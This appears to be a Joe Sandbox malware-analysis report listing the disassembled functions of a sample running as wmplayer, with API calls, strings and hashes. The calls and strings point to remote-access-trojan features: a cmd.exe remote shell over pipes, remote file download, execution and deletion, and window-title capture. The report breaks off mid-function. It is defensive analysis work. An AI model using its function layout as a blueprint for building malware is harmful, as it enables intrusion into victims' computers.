                                                                                            Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                            • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                            • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                            Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                            • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                            • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                            • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                            Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                            • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                            Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                            Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: xAG
                                                                                            • API String ID: 176396367-2759412365
                                                                                            • Opcode ID: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                            • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                            • Opcode Fuzzy Hash: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                            • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                            Function 0041A945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID: @
                                                                                            • API String ID: 1890195054-2766056989
                                                                                            • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                            • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                            • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                            • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                            Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEventStartupsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1953588214-0
                                                                                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                            Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                              • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3476068407-0
                                                                                            • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                            • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                            • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                            • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                            Function 0041AC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$ForegroundText
                                                                                            • String ID:
                                                                                            • API String ID: 29597999-0
                                                                                            • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                            • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                            • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                            • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                            Function 004106D3 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                            • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                            • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                            • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                            Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                            • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                            • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                            • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                            Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Startup
                                                                                            • String ID:
                                                                                            • API String ID: 724789610-0
                                                                                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                            Function 0040262E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Deallocate
                                                                                            • String ID:
                                                                                            • API String ID: 1075933841-0
                                                                                            • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                            • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                            • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                            • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                            Function 00410ABE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                            • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                            • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                            • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16

                                                                                            Non-executed Functions

                                                                                            Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                            • API String ID: 2918587301-599666313
                                                                                            • Opcode ID: 25acaa2856dc7008fddf9ec0cecc0cbb53e0c4836b5282fa1f3646b03ece5032
                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                            • Opcode Fuzzy Hash: 25acaa2856dc7008fddf9ec0cecc0cbb53e0c4836b5282fa1f3646b03ece5032
                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                            Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                            • API String ID: 3815868655-81343324
                                                                                            • Opcode ID: fd6885247ebe03a599233805bbd721c2697f19282cb397e78aacb19e14c40894
                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                            • Opcode Fuzzy Hash: fd6885247ebe03a599233805bbd721c2697f19282cb397e78aacb19e14c40894
                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                            Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
